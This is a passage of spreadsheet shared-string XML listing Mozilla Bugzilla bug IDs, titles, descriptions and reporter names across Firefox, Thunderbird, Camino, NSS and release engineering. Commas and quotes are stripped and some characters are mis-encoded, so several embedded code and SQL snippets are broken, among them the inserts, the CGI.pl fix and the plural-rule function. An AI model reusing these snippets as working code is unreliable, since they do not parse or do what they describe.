    <t>needed to make a few changes to get uriloader to compile and work on wince</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-413527</t>
  </si>
  <si>
    <t>Use striptease instead of strip when packaging</t>
  </si>
  <si>
    <t>We need to update the packager to use tease -S -t.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-216202</t>
  </si>
  <si>
    <t>When chatzilla receives a JOIN Command from an IRC server it don't open the new corresponding tab</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5b) Gecko/20030721
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5b) Gecko/20030721
ChatZilla doesn't open a new tab when it received the JOIN command as like
:keupon-1er!caraxy@SID25142:265892:0 JOIN :&amp;amis
this bug appear only with 0.9 series
Reproducible: Always
Steps to Reproduce:
0. Install a 0.9 ChatZilla series
1. Install caraxy
2. Perform a /server 
3. Then login caramail and wait for &amp;amis open u can wait for long ^^
Actual Results:  
the tab doesn't open !
Expected Results:  
the tab should be opened ( like when you do a /join )</t>
  </si>
  <si>
    <t>lissyx+mozillians</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-254602</t>
  </si>
  <si>
    <t>Document extension/theme submittal process</t>
  </si>
  <si>
    <t>We should have a document that explains the steps of getting a theme/extension
posted on UMO.  It will of course be updated as the process changes.  It
should say what in queue means etc.</t>
  </si>
  <si>
    <t>CORE-342511</t>
  </si>
  <si>
    <t>correcting another word (with spell checker) doesn't cause current word to be spell-checked</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1a3) Gecko/20060622 BonEcho/2.0a3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1a3) Gecko/20060622 BonEcho/2.0a3
1. Type the following in a textarea: wone twoo
2. Right-click wone and select one.
After this the insertion point moves to the right of one.  Given that the insertion point is now away from twoo twoo should be underlined as incorrect but it isn't.
Reproducible: Always</t>
  </si>
  <si>
    <t>tommyjb</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-427661</t>
  </si>
  <si>
    <t>Treehydra: Expose struct lang_type. Support anonymous tagged unions automatically</t>
  </si>
  <si>
    <t>For bug 427536 I need struct lang_type from cp-tree.h exposed to Treehydra. (We need this data to tell the different between a struct and a class.) This is a union type.
We also kind of need it for pretty-printing pointer-to-member types but that's less important.</t>
  </si>
  <si>
    <t>WEBSITES-747463</t>
  </si>
  <si>
    <t>add Gabor's blog to planet.mozilla.org (http://blog.mozilla.org/gabor/)</t>
  </si>
  <si>
    <t>gkrizsanits</t>
  </si>
  <si>
    <t>THUNDERBIRD-353347</t>
  </si>
  <si>
    <t>Wrong Quick Search label Entire Message must be renamed to Body as it does NOT search the entire message! Gross inconsistency with Search messages UI where the same search is labeled Body.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Quick Search Entire Message actually searches just the message body not the headers as well which is confusing and inconsistent with Edit -&gt; Find -&gt; Search Messages. It should be changed to Body for both consistency and reduced confusion.
Reproducible: Always</t>
  </si>
  <si>
    <t>jnavas</t>
  </si>
  <si>
    <t>MOZILLA.ORG-473858</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Carsten Book </t>
  </si>
  <si>
    <t>Hi
i'm the technical admin for the new quality.mozilla.org site. To make changes on qmo and to fix bugs like Bug 473593
I need to access to http://svn.mozilla.org/projects/quality.mozilla.org/branches/qmo2/ and to qmo on authstage thanks
Public Key is in Bug 394903</t>
  </si>
  <si>
    <t>NSS-131171</t>
  </si>
  <si>
    <t>Add HP-UX IPF (ia64) NSS support</t>
  </si>
  <si>
    <t>Need to add build configuration for IPF (11.20 on ia64 for hp-UX)</t>
  </si>
  <si>
    <t>CORE-341245</t>
  </si>
  <si>
    <t>Remove some unused box object related interfaces</t>
  </si>
  <si>
    <t>There are some interfaces in layout/xul/base/public which aren't used at all.
for example nsIBoxLayoutManager and nsIBoxPaintManager.
I think those can be removed.
nsIBrowserBoxObject nsIIFrameBoxObject and nsIEditorBoxObject have all just
one attribute |readonly attribute nsIDocShell docShell|
IMO those could be merged to nsIDocShellContainer or whatever would be a good
name.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-528391</t>
  </si>
  <si>
    <t>Enhanced Localization (phase 1)</t>
  </si>
  <si>
    <t>nnguyen</t>
  </si>
  <si>
    <t>MOZILLA.ORG-368682</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Biswatosh Chakraborty </t>
  </si>
  <si>
    <t>Created attachment 253316
My SSH public key
In March 2006I had faxed CVS Contributor Form to Marcia Knous. I have a copy of the Fax. 
Julien Pierre had filed a bug (see https://bugzilla.mozilla.org/show_bug.cgi?id=331517
)
requesting canconfirm and edit bug permissions to me. But I dont think I have a 
cvs write access. In case the Faxed copy is not there I can resend that. I am attaching my ssh pub key. Pls tell me if I am missing anything.</t>
  </si>
  <si>
    <t>BUGZILLA-473553</t>
  </si>
  <si>
    <t>ERROR_MODE_DIE should be the default if the script is not CGI</t>
  </si>
  <si>
    <t>Created attachment 356944
patch v1
Bug 467701 makes Bugzilla-&gt;usage_mode return USAGE_MODE_CMDLINE if the script is not CGI. But when an error occurs Bugzilla-&gt;error_mode no longer returns ERROR_MODE_DIE because the explicit call Bugzilla-&gt;usage_mode(USAGE_MODE_CMDLINE) has been removed.
This means we have to implement the same behavior for Bugzilla-&gt;error_mode and return ERROR_MODE_DIE if the script is not CGI.</t>
  </si>
  <si>
    <t>SEAMONKEY-274238</t>
  </si>
  <si>
    <t>nsBuildID.h has insufficient dependencies</t>
  </si>
  <si>
    <t>I moved aside an object directory that had been through many depend builds and
rebuilt it from scratch to find a dependency problem.  (I haven't actually found
the problem yet.)  This showed me that mozilla/config/nsBuildID.h has
insufficient dependencies.  The diff of nsBuildID.h between the trees (built
from identical source) was:
--- firefox-opt.bad/config/nsBuildID.h  2004-11-16 12:25:10.000000000 -0800
+++ firefox-opt/config/nsBuildID.h      2004-12-11 15:40:24.515097109 -0800
@@ -1410 +1410 @@
  * If creating a release build (eg MOZILLA_OFFICIAL is set) then
  * GRE_BUILD_ID will be updated to contain _.
  * If building a milestone build (eg MOZ_MILESTONE_RELEASE is set) then
  * GRE_BUILD_ID will just contain .
  *
  */
-#define GRE_BUILD_ID 1.8a5_0000000000
+#define GRE_BUILD_ID 1.8a6_0000000000
 #endif /* _NSBUILDID_H_ */
(The copies in dist which are symlinks to this one differ the same way of
course.)</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-504239</t>
  </si>
  <si>
    <t>Remove a useless chunk of a likely-unused script for a barely-supported configuration</t>
  </si>
  <si>
    <t>Created attachment 388618
rm
Back in the day of srcdir builds clean-config.sh was probably pretty handy: no need to even have a mozconfig findable just fire it off from $topsrcdir and it would remove all makefiles (that were produced by all-makefiles anyway) and configure output.
Now with srcdir support amounting to we won't automatically wontfix a bug just because it only happens with srcdir builds it probably doesn't see much if any use but it's still pointless to have it looking for a file which hasn't existed since bug 381902 landed two years ago as a sign that it needs to remove mailnews makefiles when mailnews doesn't exist in mozilla-central.
(And yes I'm afraid it would amuse me if the timing works out so this is the 500th bug I've fixed. Triviality a speciality.)</t>
  </si>
  <si>
    <t>CORE-278960</t>
  </si>
  <si>
    <t>mFont variable in nsWindow write-only</t>
  </si>
  <si>
    <t>mFont is only ever written to in SetFont:
NS_METHOD nsWindow::SetFont(const nsFont &amp;aFont)
{
  // Cache Font for owner draw
  if (mFont == nsnull) {
    mFont = new nsFont(aFont)
  } else {
    *mFont  = aFont
  }
Other than this it's not used. so it looks like it can be eliminated.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-469224</t>
  </si>
  <si>
    <t>Add SeaMonkey 2.0a2 and 2.0a3pre to crash-stats.m.c</t>
  </si>
  <si>
    <t>SeaMonkey has released 2.0a2 and changed the trunk to 2.0a3pre both those versions should be added to crash-stats.m.c so people can search for them.
SQL statements:
insert into branches(productversionbranch)
values('SeaMonkey''2.0a2''1.9.1')
insert into branches(productversionbranch)
values('SeaMonkey''2.0a3pre''1.9.1')</t>
  </si>
  <si>
    <t>TOOLKIT-480178</t>
  </si>
  <si>
    <t>Billboard should extend to available space and the update UI should be the same width for all locales</t>
  </si>
  <si>
    <t>Instead of a page that has a browser element change the update snippet format to include references to resources (images text) which will be assembled in a XUL dialog on the client side.</t>
  </si>
  <si>
    <t>NSS-62975</t>
  </si>
  <si>
    <t>qa_report broken for other days than today</t>
  </si>
  <si>
    <t>attempted to rum qa_stat on yesterday's build with BUILDNUMBER 2 - just habngs
without any output killed after 1/2 hour</t>
  </si>
  <si>
    <t>MOZILLA.ORG-133639</t>
  </si>
  <si>
    <t>fix npm.general's mail gateway</t>
  </si>
  <si>
    <t>Some is signing up npm.general's mail gateway address to hundreds of mailing
lists.  This is causing a huge amount of spam.  It would seem the only way to
stop it is to disable the gateway to npm.general.</t>
  </si>
  <si>
    <t>BUGZILLA-276605</t>
  </si>
  <si>
    <t>Ignore vote changes when usevotes = 0</t>
  </si>
  <si>
    <t>Actually you can still change your votes even if usevotes = 0 (via such an URL:
votes.cgi?bug_id=64&amp;action=show_user). Consequently you can still confirm bugs
if the following conditions are satistfied in CheckIfVotedConfirmed():
if ($votes &gt;= $votestoconfirm &amp;&amp; $status eq $::unconfirmedstate) {...}
We need to prevent that. I have a patch.</t>
  </si>
  <si>
    <t>NSS-328400</t>
  </si>
  <si>
    <t>test_socket fails intermittently on windows</t>
  </si>
  <si>
    <t>If you run this libpkix test program in a loop it will fail intermittently at step CLIENT_RECV4 . When this happens the server socket is already closed and the client socket is ready the data from it but gets an error.
I believe this may be related to an NSPR issue where PR_Shutdown needs to be called before PR_Close . This problem isn't seen on other platforms.</t>
  </si>
  <si>
    <t>CORE-237344</t>
  </si>
  <si>
    <t>Contractions not recognized by spelling checker when real apostrophe character used</t>
  </si>
  <si>
    <t>When using a +ve contraction (e.g. we've) and a real apostrophe character
(U+2019) instead of a foot mark (U+0027) the spelling checker fails to
recognize the contraction. All other contractions (+s +ll +t +re +m and +d)
are apparently recognized when using either symbol.
To reproduce:
Create a new e-mail message and type in we've weâ€™ve (using the real apostrophe
in the second word)
2. Check spelling
Actual results:
Spelling checker flags the second instance of ve as a word by itself
Expected results:
Spelling checker should show no misspellings.</t>
  </si>
  <si>
    <t>CORE-496824</t>
  </si>
  <si>
    <t>JS_REQUIRES_STACK violation in JS_EvaluateUCInStackFrame</t>
  </si>
  <si>
    <t>http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1244403638.1244403731.21809.gz
jsdbgapi.cpp: In function 'JSBool JS_EvaluateUCInStackFrame(JSContext* JSStackFrame* const jschar* uintN const char* uintN jsval*)':
jsdbgapi.cpp:1268: error: cannot access JS_REQUIRES_STACK variable JSContext::fp
jsdbgapi.cpp:1272: error: cannot access JS_REQUIRES_STACK variable JSContext::fp
Blame for these lines points to bug 494235.</t>
  </si>
  <si>
    <t>SOCORRO-700839</t>
  </si>
  <si>
    <t>Update PostgreSQL servers to version 9.0.6</t>
  </si>
  <si>
    <t>While PostgreSQL 9.0.5 does not have any critical fixes in it which affect our application it's a good idea to keep up with the latest patches.  As such I'd like to schedule an update of our production servers as soon as convenient.</t>
  </si>
  <si>
    <t>CORE-505034</t>
  </si>
  <si>
    <t>Compiling Nativei386.cpp on MinGW fails because of different syntax of inline asm.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Build Identifier: 
Preprocessor instructions assume that all WIN32 and WIN64 code is compiled using MSVC.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-7229</t>
  </si>
  <si>
    <t>chofmann's watchlist</t>
  </si>
  <si>
    <t>all the good little girls and boys that I'm watching</t>
  </si>
  <si>
    <t>THUNDERBIRD-252150</t>
  </si>
  <si>
    <t>shouldn't show deferred accounts in search dialog</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040707 Firefox/0.9.2
When using the new Thunderbird builds with the global inbox the list of folders
to seach in contains folders that do not exist.
For example if all acount resolves to the Local Folders folder (i.e. if each
account does *not* have his own folder) each account is still listed with his
sent draft... subfolders. And this is the case even when these folders
actually do not exist.
Reproducible: Always
Steps to Reproduce:
1. get the Thunderbird build with the global inbox
2. create 2 accounts
3. Tools -&gt; Account Settings -&gt; account1 - &gt; Server settings -&gt; advanced: click
on Global inbox.
4. Tools -&gt; Account Settings -&gt; account1 - &gt; Server settings -&gt; advanced: click
on Global inbox.
5. organize your folders so that you have only Local folders and no folder
for account1 and account2.
6. right click on a folder -&gt; search messages
Actual Results:  
the drop down menu on top of the search windows displays account1 - inbox
drafts sent... acount2 - inbox drafts sent... Local folders - inbox
drafts sent... even though the account1 and account2 folders do not exists.
Expected Results:  
only existing folders should be displayed.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-526392</t>
  </si>
  <si>
    <t>Add a cleanup job for Thunderbird nightly l10n directories</t>
  </si>
  <si>
    <t>Created attachment 410122
Free disk graph
Since nightly updates for l10n where supported by Thunderbird there has been a build up of directories like thunderbird/nightly/2009/10/2009-10-16-04-comm-1.9.1-l10n (see the change of slope in the green line around 10/10). They're using some 150G at the moment and while there's still lots of space free there's no need to retain those directories more than a few days. Nightly updates always point to the most recent build and l10n nightlies are not retained on ftp.m.o.
There's a once-a-day cron job to clean up the Firefox equivalent so this bug is about
* asking gozer if he agrees with extending the cleanup to Thunderbird
* implementing that
The cron would execute
 find /pub/mozilla.org/thunderbird/nightly/20?? -mindepth 2 -maxdepth 2 -type d -name '*-comm-*-l10n' -mtime +5 -exec rm -rfv {} \</t>
  </si>
  <si>
    <t>TOOLKIT-391870</t>
  </si>
  <si>
    <t>Have the download manager store the referring uri when appropriate (and use it in the front end)</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a8pre) Gecko/2007081115 Minefield/3.0a8pre ID:2007081115
1. Complete a download
2. Click on the Information button. You get a date and two buttons.
   The second button opens the dir the file downloaded to.
   The first button doesn't appear to do anything (it should open the file?)
So what should the first button do?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-419400</t>
  </si>
  <si>
    <t>Lock requests failing with error 500 for some Weave users</t>
  </si>
  <si>
    <t>This was reported on the forums:
https://labs.mozilla.com/forum/index.php/topic552.0.html
The specific URL that seems to be returning an error is:
https://services.mozilla.com/user/94e2c2c1c9786d3901bad7488ca4cf16c3c9556f/
I've seen this sort of thing before with my local apache installation I 'fixed' it by removing the lock db entirely.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-396232</t>
  </si>
  <si>
    <t>one sample.config for all platforms</t>
  </si>
  <si>
    <t>Created attachment 280954
sample.config cross platform work
In an attempt to clean up the talos configuration world I've come up with this:
- entirely get rid of config.py
- move everything into sample.config
- normalize all paths in sample.config to be workable across platforms (ie a path of 'pageloader/chrome' will be correctly interpreted as 'pageloader\chrome' on windows)
- to handle the different counter options under different platforms created win_counters and unix_counters which are correctly used depending on the system
- add a --debug option and get that out of the config file
So as long as things are installed in the 'standard' locations you should be able to run talos across win/mac/linux using the same sample.config.  The only change that you should have to make is the name of firefox (as it will be firefox.exe on windows and firefox on unix style systems).  If this last requirement would get in the way it could be hacked to guess the correct name for a firefox executable on different systems.
I'm hoping that this will help alleviate the problem of managing config files for multiple systems/configurations.</t>
  </si>
  <si>
    <t>BUGZILLA-104177</t>
  </si>
  <si>
    <t>typo in CGI.pl breaks keywords (editkeywords.cgi) link in footer</t>
  </si>
  <si>
    <t>In current CVS in CGI.pl in sub GetCommandMenu
        if (UserInGroup(editkeywords)) {
            $html .=  keywords\n
        }
Should be
        if (UserInGroup(editkeywords)) {
            $html .=  keywords\n
        }</t>
  </si>
  <si>
    <t>mattdm</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-382162</t>
  </si>
  <si>
    <t>Socorro not processing Mac crash reports</t>
  </si>
  <si>
    <t>The socorro processor at crash-reports.mozilla.com is not processing Mac crash reports. I don't know why so here's a little summary of what we do know:
1) The mac crash reporter client says the report was submitted correctly and gives a UUID for the report:
I just submitted a report at 7:25 AM PDT and got back a UUID of bp-1bc88c87-0c5e-11dc-98fc-001a4bd43ef6
2) When I test on my local collector/processor everything appears to work correctly.
Steps to diagnose:
I think we need to review the logs from the processor. Aravind is the output from the processor currently being logged and is there some way to get access to these logs?
This is potentially blocking release of 1.9a5 with breakpad on the mac so we should try to get this figured out on Tuesday.</t>
  </si>
  <si>
    <t>CORE-361401</t>
  </si>
  <si>
    <t>nsAppleFileDecoder assumes big-endian platform effectively corrupts AppleDouble thunderbird mail attachments</t>
  </si>
  <si>
    <t>images I save from a certain message are corrupt problems with AppleDouble encoded Macintosh files?
I'm using version 2 beta 1 (20061118)
I have a message that someone sent me from a mac and I can see the images in the message but when I try to save them and then open them they are corrupt.  (see screen shot)
when I do file on the saved image I get AppleDouble encoded Macintosh file instead of JPEG image data EXIF standard 2.2 which I get when I save the message from Mail.app
I'll attach some screen shots and the test message</t>
  </si>
  <si>
    <t>CALENDAR-269266</t>
  </si>
  <si>
    <t>Create/maintain Mac OS X pinstripe theme for Sunbird</t>
  </si>
  <si>
    <t>I have already begun adding pieces to pinstripe to make Sunbird more Mac-like.
I will attach patches here to continue filling out the pinstripe theme.</t>
  </si>
  <si>
    <t>THUNDERBIRD-500747</t>
  </si>
  <si>
    <t>need hint for short cut key in quick search input field - emptytext of  (ctrl-k)</t>
  </si>
  <si>
    <t>need hint for short cut key in quick search input field - emptytext of  (ctrl-k). Or the prevailing OS's short cut eg Command-Option-F on Mac
this is in followup to bug 259587</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-478242</t>
  </si>
  <si>
    <t>From field for sending emails from groups</t>
  </si>
  <si>
    <t>Jay sent an email to his campus reps group (2000+ members) on Tuesday. As a member of the group I received it early on Thursday. 
There might be 2 issues with sending emails from groups:
- the 36 hour delay seems pretty long is it possible to look through the logs and see if most of the emails were delivered right away?
- the email I received shows the following sender: 
From: root  
Where can we change what appears as From so that the name says SpreadFirefox instead of root?
Thanks!</t>
  </si>
  <si>
    <t>CORE-155447</t>
  </si>
  <si>
    <t>N70PR1 M1.0 M11A crash [@ KERNEL32.DLL]</t>
  </si>
  <si>
    <t>bug for talkback team survey. maybe a problem with run() when calling
do_GetService and checking the var rv.
Stack trace(Frame) 
	 KERNEL32.DLL + 0xb9a6 (0xbff7b9a6)  
	 nsAppShell::Run
[nsAppShell.cpp  line 134] 
	 nsAppShellService::Run
[nsAppShellService.cpp  line 451] 
	 main1
[nsAppRunner.cpp  line 1472] 
	 main
[nsAppRunner.cpp  line 1808] 
	 WinMain
[nsAppRunner.cpp  line 1826] 
	 WinMainCRTStartup()  
	 KERNEL32.DLL + 0x1b560 (0xbff8b560)  
	 KERNEL32.DLL + 0x1b412 (0xbff8b412)  
	 KERNEL32.DLL + 0x19dd5 (0xbff89dd5)</t>
  </si>
  <si>
    <t>ngh114</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-343804</t>
  </si>
  <si>
    <t>Registration at addons.mozilla.org fails if one requests reset password e-mail before activating account.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Reproducible: Didn't try
Steps to Reproduce:
1. I registered at addons.mozilla.org
2. Before I received the activation e-mail I requested a reset password e-mail.
3. Tried to activate my account.
Actual Results:  
After I did so (see Steps to Reproduce) activation of the account fails (There was an error activating vaurynov@mit.edu). I am allowed to reset password but the password does not work (You were not successfully logged in. Check your e-mail address and password and try again.) I can not recreate the account either (The E-Mail address you entered is already in use.) So I could not find a way out of the circle.
Expected Results:  
If account was not activated yet and a user tries to request a reset password e-mail he/she must get an error message asking to activate the account before resetting password. 
Or (which would be even better) if an account is not activated yet and user requests a reset password e-mail he/she should get an activation e-mail instead.
It takes quite long time to receive *any* e-mail from you (either activation or reset password) after one follows the steps described above. I tried to reproduce the problem using an other e-mail address but after ~40 min of waiting for an e-mail from from you I decided just to send what I have now.</t>
  </si>
  <si>
    <t>vaurynov</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-253955</t>
  </si>
  <si>
    <t>Use OS/2's Multimedia (MMOS2) API for sound output</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.8a3) Gecko/20040725
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.8a3) Gecko/20040725
Currently sounds on OS/2 are passed on to the default WPS association to be
played. This is less than ideal especially in sounds that arrive as datastream
in the method  nsSound::OnStreamComplete in widget/src/os2/nsSound.cpp have to
be written to disk before being passed on.
Instead the MMOS2 API is capable in principle to output the sounds directly
from within Mozilla. Some (non-functioning commented) code is already present
in nsSound.cpp.
Reproducible: Always
Steps to Reproduce:
I am already working on this and will shortly attach a first patch that
replaces the functionality in nsSound::OnStreamComplete but does not yet touch
nsSound::PlaySystemSound.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-37370</t>
  </si>
  <si>
    <t>Cmd-line Features</t>
  </si>
  <si>
    <t>Switch command-line-handler to use category manager instead of a ProgID naming scheme.</t>
  </si>
  <si>
    <t>Currently a command-line-argument-handler component needs to have a specific
ProgID for the command-line handler to be able to find it.
The jsconsole command-line-argument-handler for example _has_ to be named
'component://netscape/commandlinehandler/general-startup-jsconsole'. See bug
#37275 for more info on why this is now regarded as wrong.
Instead a command-line-argument0handler needs to register itself with the
category manager. JS example:
  var catman = Components.classes['mozilla.categorymanager.1']
      .getService(Components.interfaces.nsICategoryManager)
  catman.addCategoryEntry('command-line-argument-handlers' 'jsconsole'
      JSCONSOLESERVICE_PROGID true true)
Where JSCONSOLESERVICE_PROGID can be any string but preferably conforming to
the new naming scheme. I choose 'org.mozilla.general-startup.jsconsole.1' for
now.
I realize that the category manager is being used now as well just not in the
way the IDL states it should be used.</t>
  </si>
  <si>
    <t>mj</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-212054</t>
  </si>
  <si>
    <t>When cache folder &gt;2000 items will eventually cause crash then program won't start at all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.0.1) Gecko/20030306 Camino/0.7
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.0.1) Gecko/20030306 Camino/0.7
Several times Camino has crashed and then been un-bootable that is the program
tries to open and never finishes opening (splash screen never comes up even
though hard drive is ticking away). I'm not really technically savvy and the
only fix I have come up with is deleting everything in the cache (I haven't
found a way to purge the cache from within Camino). This last time there were
over 6000 items in the cache folder when it crashed. Once those items are
deleted Camino will start again.
Selected Crash log info:
Date/Time:  2003-07-05 19:44:25 -0400
OS Version: 10.2.6 (Build 6L60)
Command:    Camino
PID:        2929
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000000
If you decide you can do something with this please let me know if I'm leaving
out any other info that would be helpful.
Reproducible: Always
Steps to Reproduce:
1.Wait until cache exceeds 2000 items.
2.
3.
Actual Results:  
Program crash then won't start again until all cache items deleted.
Expected Results:  
Continued to function and start as intended.</t>
  </si>
  <si>
    <t>jenn</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-499496</t>
  </si>
  <si>
    <t>qm-vmware01 paging non-responsive</t>
  </si>
  <si>
    <t>nagios started paging about non-responsive checks on qm-vmware01 about 10:48am.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-421305</t>
  </si>
  <si>
    <t>Don't duplicate string entries in prefpane bundles</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O sv rv:1.8.1.13pre) Gecko/20080213 Camino/1.6b3pre (like Firefox/2.0.0.13pre)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O sv rv:1.8.1.13pre) Gecko/20080213 Camino/1.6b3pre (like Firefox/2.0.0.13pre)
From comment #3 in bug 410110:
I am wondering why some strings from the main bundle are duplicated in pref
panes...? Can't we just fetch the strings from the main bundle by using
alternate NSLocalizedString functions?
These are the duplicates:
http://mxr.mozilla.org/mozilla1.8/source/camino/resources/localized/English.lproj/Localizable.strings.in#404 (lines 404-415)
Reproducible: Always</t>
  </si>
  <si>
    <t>markus.magnuson</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-142860</t>
  </si>
  <si>
    <t>fails to handle files edited on Mac/Windows correctly</t>
  </si>
  <si>
    <t>Doctor doesn't handle files edited on Mac/Windows correctly.  It assumes the
files have Unix-style line endings (\n) so it thinks files with Mac-style
endings (\r) or Windows-style endings (\r\n) have had every line of the file
changed.
Doctor should either detect the default line ending style for the file and
adjust the edited content accordingly or tell CVS to ignore white-space changes.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-498110</t>
  </si>
  <si>
    <t>Abstract buildbotcustom factories for comm-central release automation</t>
  </si>
  <si>
    <t>For making comm-central release automation work we need to abstract release factories as well as CC* factories somewhat I'm working on this and will post a patch once I can test everything reasonably.</t>
  </si>
  <si>
    <t>WEBSITES-497402</t>
  </si>
  <si>
    <t>add blog.mozilla.com/data to planet</t>
  </si>
  <si>
    <t>I am a peer - please make it so.  thanks!</t>
  </si>
  <si>
    <t>CORE-416636</t>
  </si>
  <si>
    <t>Remove JSCLASS_FIXED_BINDING</t>
  </si>
  <si>
    <t>Since we/ECMA had to backpedal on making the core classes RO/DD on the global object there are no users of this in-tree.  If we're going to expose something like this it seems better to do so only when the need actually manifests itself especially as embedders can just set property attributes in a second JSAPI call with essentially no difference in behavior.  We need to remove JSCLASS_FIXED_BINDING before we make a JS1.8 release that would otherwise include it.</t>
  </si>
  <si>
    <t>FIREFOX-359349</t>
  </si>
  <si>
    <t>when view | by last visited in history sidebar don't show sessions by default</t>
  </si>
  <si>
    <t>[rfe] when view | by last visited in history sidebar show sessions
we actually get this RFE for free when we switch to using places.
this is just a heads up to make sure that we indeed want this feature.  I'll attach a screen shot.
additionally it's not just when we do view | by last visited.  you'd get sessions when ever the results are visits and we're sorted by date and we're either not grouping or we're grouping by date (once bug #358784 lands that is.)
for that logic see http://lxr.mozilla.org/seamonkey/source/toolkit/components/places/src/nsNavHistoryResult.cpp#3852</t>
  </si>
  <si>
    <t>CORE-48299</t>
  </si>
  <si>
    <t>need to distinguish between chrome/content in JS console messages</t>
  </si>
  <si>
    <t>Script error reports going thru the JS console have a 'category' field that says
something about where the error originated.  Currently the layout error
reporter says 'XUL/Content JavaScript' which doesn't distinguish between errors
in the UI JS code itself and in downloaded content.
This is a useful distinction users might be confused on seeing errors resulting
from XUL js.  It'd be good to provide a way to distinguish.
Ben you had console code that used this any chance of getting it in?</t>
  </si>
  <si>
    <t>CORE-413670</t>
  </si>
  <si>
    <t>Add plural rules for Irish ga-IE Arabic Maltese Macedonian</t>
  </si>
  <si>
    <t>The GNU gettext manual has been wrong for some time now unfortunately.  The most general case in practice has five different plural forms e.g. when translating %n things:
one: ceann amhÃ¡in
two: dhÃ¡ cheann
3-6: %d cinn
7-10: %d gcinn
11+: %d ceann 
For PO files in KDE and the GNU Translation Project we use this Plural-Forms string:
Plural-Forms: nplurals=5 plural=n==1 ? 0 : (n==2) ? 1 : (n&gt;2 
Below is my attempt at mimicking the style I see here (trusting you on the precedence of operators):
http://mxr.mozilla.org/mozilla/source/intl/locale/src/PluralForm.jsm#59
function(n) n==1?0:n==2?1:n=&gt;3&amp;&amp;n=7&amp;&amp;n&lt;=10?3:4</t>
  </si>
  <si>
    <t>kscanne</t>
  </si>
  <si>
    <t>THUNDERBIRD-324458</t>
  </si>
  <si>
    <t>Thunderbird will not build with Cocoa widgets</t>
  </si>
  <si>
    <t>Trunk Thunderbird will not build when using Coocoa widgets. My mozconfig:
----------------------
. $topsrcdir/mail/config/mozconfig
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/tbird_cocoa_debug_obj
ac_add_options --enable-debug
ac_add_options --disable-optimize
ac_add_options --enable-default-toolkit=cocoa
----------------------
Mac OS X 10.4.4 Xcode 2.2</t>
  </si>
  <si>
    <t>TOOLKIT-299730</t>
  </si>
  <si>
    <t>Chrome registry needs to be able to enumerate locales (for locale-switcher extension) and cleanup of manifest modifier parsing</t>
  </si>
  <si>
    <t>This bug covers two different things:
1) in order to support the locale-switcher extension in 1.1 I need to be able to
enumerate available locales for a particular package (trivial)
2) I've been looking through uses of the .manifest modifiers and future
potential uses and I want to change the parsing strategy a little bit
  a) add application={app-id}
  b) add version= version version&gt;=
  c) if we encounter an expected modifier treat the entire line as invalid</t>
  </si>
  <si>
    <t>CORE-300453</t>
  </si>
  <si>
    <t>'Disable common annoyances' prevents focusing of designmode iframes</t>
  </si>
  <si>
